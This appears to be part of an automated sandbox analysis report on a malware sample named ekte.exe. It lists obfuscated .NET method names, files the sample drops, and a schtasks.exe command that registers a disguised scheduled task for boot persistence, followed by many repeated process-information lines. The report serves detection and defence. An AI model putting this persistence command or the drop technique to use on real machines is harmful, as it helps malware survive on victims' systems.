Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, DSJdqD9Y86mwaZScjh.cs High entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs High entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, iE2YC2sTBAG7vR9RqE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, zpJ0IIOQqJJKMuU1Tp.cs High entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, IllM6A3aZOPcMgXjOU.cs High entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, bjGcTBS7eYkmH0ESo8.cs High entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, LbhCp6bqvsHPITEbbd.cs High entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, EBF8HKpg2H8gNx5JlU.cs High entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs High entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, FBLsfKKwpF9k583lKwM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, vt8cqPvll0puwSpjTi.cs High entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, bWcZ41KMwu9OHEiK6Qt.cs High entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, nNTYENVbpVNaaaQZwt.cs High entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, UkVUKC2jEai4CGi2Se.cs High entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, PJcM4TPF3FkembsOYq.cs High entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, wyR6uyonrymvyqkOh2.cs High entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, WBNVGjz7eRqJ47EZn1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, K1rZtSUuKDiT2gXLO3.cs High entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, m6ldtHNLsJmcXYbkiX.cs High entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, rrydSlZNZ76wCXitSf.cs High entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, DSJdqD9Y86mwaZScjh.cs High entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs High entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, iE2YC2sTBAG7vR9RqE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, zpJ0IIOQqJJKMuU1Tp.cs High entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
Drops PE files
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
